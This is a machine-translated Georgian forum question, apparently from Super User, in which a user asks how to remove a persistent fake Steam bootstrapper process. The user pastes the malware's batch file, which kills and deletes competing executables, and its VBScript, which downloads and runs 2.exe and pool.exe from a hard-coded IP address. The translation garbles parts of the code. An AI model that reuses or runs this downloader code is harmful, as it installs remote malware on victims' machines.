ფანჯრები - როგორ მუდმივად მოკვლა steam კლიენტი bootstrapper - სუპერ მომხმარებელი
ჩემი ამოცანა მენეჯერის შემდეგ სიტუაცია მაქვს:
მე არ ვიცი, რა სახის აპლიკაციაა, მაგრამ ნამდვილად არ არის ორთქლის კლიენტის bootstrapper იმიტომ, რომ მე არ დაამონტაჟე და ასევე ვერ წაშალოთ იგი.
მე ვხედავ რაღაცას:
In MS Config კომუნალური მე არ აღმოაჩინა არაფერი რომ ჰგავს secury.exe.
ფაილის გახსნისას, მე ვხედავ სამი ფაილი:
m.bat, b.exe, 4.vbs.
ქვემოთ მოყვანილია შინაარსი m.bat:
taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe
შემდეგი მიდის 4.vbs:
Xpost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 კომპლექტი xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Run "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Run "del C: \ ProgramData \ pool3.exe"
რა შემიძლია გავაკეთო იმისათვის, რომ შევწყვიტო წერა? ��ქსპორტი ჩემი სერვერის კომპიუტერული სისტემების ბოროტად გამოყენებისაგან?
PS მე შეასრულა Avast სრული შემოწმება ჩემი კომპიუტერი, მაგრამ ეს ვერ იპოვა არაფერი არასწორია.
?ქსპორტი ჩემი სერვერის კომპიუტერული სისტემების ბოროტად გამოყენებისაგან?